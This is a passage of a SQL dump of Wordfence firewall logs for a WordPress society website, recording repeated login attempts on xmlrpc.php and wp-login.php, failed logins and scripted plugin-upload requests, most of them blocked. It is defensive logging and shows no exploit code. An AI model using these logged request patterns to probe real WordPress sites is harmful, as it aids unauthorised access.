Network',NULL),(11927,0.000000,1631137521.224914,'\0\0\0\0\0\0\0\0\0\0����L',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11928,0.000000,1631137803.395894,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11929,0.000000,1631138080.404063,'\0\0\0\0\0\0\0\0\0\0���c9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11930,0.000000,1631138350.502350,'\0\0\0\0\0\0\0\0\0\0��g��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11931,0.000000,1631138678.514753,'\0\0\0\0\0\0\0\0\0\0���[i�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11932,0.000000,1631138972.240722,'\0\0\0\0\0\0\0\0\0\0��^��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11933,0.000000,1631139551.519980,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11934,0.000000,1631139850.029800,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11935,0.000000,1631140188.990621,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11936,0.000000,1631140451.820864,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11937,0.000000,1631140787.164331,'\0\0\0\0\0\0\0\0\0\0���i��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11938,0.000000,1631141090.586836,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11939,0.000000,1631141397.733506,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11940,0.000000,1631141693.820359,'\0\0\0\0\0\0\0\0\0\0��ca�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11941,0.000000,1631141995.714038,'\0\0\0\0\0\0\0\0\0\0��h�f�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11942,0.000000,1631142627.478722,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11943,0.000000,1631142974.673559,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11944,0.000000,1631143303.855183,'\0\0\0\0\0\0\0\0\0\0����s',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11945,0.000000,1631143624.991371,'\0\0\0\0\0\0\0\0\0\0��?\n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11946,0.000000,1631143919.940145,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11947,0.000000,1631144230.113683,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11948,0.000000,1631144593.926860,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11949,0.000000,1631144896.547538,'\0\0\0\0\0\0\0\0\0\0���#\r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11950,0.000000,1631145246.233307,'\0\0\0\0\0\0\0\0\0\0��QDD�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11951,0.000000,1631145589.237836,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11952,0.000000,1631145928.806755,'\0\0\0\0\0\0\0\0\0\0��P��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11953,0.000000,1631146243.880968,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11954,0.000000,1631146598.442885,'\0\0\0\0\0\0\0\0\0\0���H�l',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11955,0.000000,1631146940.364982,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11956,0.000000,1631147279.436890,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11957,0.000000,1631147561.397924,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11958,1631147562.704991,1631147562.625600,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11959,0.000000,1631147602.964717,'\0\0\0\0\0\0\0\0\0\0����\'',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11960,0.000000,1631147967.393245,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11961,0.000000,1631148176.942923,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11962,1631148188.798026,1631148188.696600,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11963,0.000000,1631148655.967439,'\0\0\0\0\0\0\0\0\0\0��j',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11964,0.000000,1631149011.707046,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11965,0.000000,1631149325.104987,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11966,0.000000,1631149710.467314,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11967,0.000000,1631155380.293755,'\0\0\0\0\0\0\0\0\0\0���6�C',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','loginFailInvalidUsername',NULL,NULL),(11968,0.000000,1631155936.227494,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11969,1631155939.960813,1631155939.881300,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11970,0.000000,1631164380.713656,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11971,0.000000,1631164442.280997,'\0\0\0\0\0\0\0\0\0\0��_o�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11972,0.000000,1631166261.828025,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11973,0.000000,1631166322.312229,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11974,0.000000,1631168183.208349,'\0\0\0\0\0\0\0\0\0\0��@o~ ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11975,0.000000,1631168249.978890,'\0\0\0\0\0\0\0\0\0\0��/sM�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11976,0.000000,1631170107.355485,'\0\0\0\0\0\0\0\0\0\0�����q',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11977,0.000000,1631170171.791346,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11978,0.000000,1631172149.013943,'\0\0\0\0\0\0\0\0\0\0���1O',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11979,0.000000,1631173425.776873,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11980,1631173427.195870,1631173427.116800,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11981,0.000000,1631174049.816667,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11982,0.000000,1631174114.189049,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11983,0.000000,1631174185.961927,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11984,1631174187.792871,1631174187.374300,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11985,0.000000,1631176041.659189,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11986,0.000000,1631176105.367594,'\0\0\0\0\0\0\0\0\0\0��=��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11987,0.000000,1631178036.549554,'\0\0\0\0\0\0\0\0\0\0����*}',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11988,0.000000,1631178105.137561,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11989,0.000000,1631180038.168635,'\0\0\0\0\0\0\0\0\0\0��4��~',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11990,0.000000,1631180104.365784,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11991,0.000000,1631182087.345473,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11992,0.000000,1631182151.045300,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11993,0.000000,1631184209.913868,'\0\0\0\0\0\0\0\0\0\0��t˖G',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11994,0.000000,1631186300.947016,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11995,0.000000,1631186371.514488,'\0\0\0\0\0\0\0\0\0\0���捫',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11996,0.000000,1631213361.338403,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11997,1631213364.734485,1631213364.619500,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11998,0.000000,1631214167.099244,'\0\0\0\0\0\0\0\0\0\0�����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11999,1631214170.225902,1631214169.942800,'\0\0\0\0\0\0\0\0\0\0�����U',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12000,0.000000,1631219983.837280,'\0\0\0\0\0\0\0\0\0\0���X2�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12001,0.000000,1631220112.510072,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12002,0.000000,1631221232.091717,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12003,0.000000,1631221375.903802,'\0\0\0\0\0\0\0\0\0\0���75�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12004,0.000000,1631223848.064827,'\0\0\0\0\0\0\0\0\0\0���H�%',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12005,0.000000,1631223976.688976,'\0\0\0\0\0\0\0\0\0\0��E�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12006,0.000000,1631227812.688644,'\0\0\0\0\0\0\0\0\0\0��E��x',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12007,0.000000,1631227943.091812,'\0\0\0\0\0\0\0\0\0\0��/� ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12008,0.000000,1631229329.582792,'\0\0\0\0\0\0\0\0\0\0�����_',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12009,0.000000,1631229467.812002,'\0\0\0\0\0\0\0\0\0\0���n\\�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12010,0.000000,1631231175.724274,'\0\0\0\0\0\0\0\0\0\0���D',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(12011,0.000000,1631247376.308850,'\0\0\0\0\0\0\0\0\0\0��iG��',0,200,0,1,0,'https://bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(12012,0.000000,1631247381.146367,'\0\0\0\0\0\0\0\0\0\0��iG��',0,200,0,1,0,'https://bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(12013,0.000000,1631247386.114249,'\0\0\0\0\0\0\0\0\0\0��)���',0,503,0,0,0,'https://bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 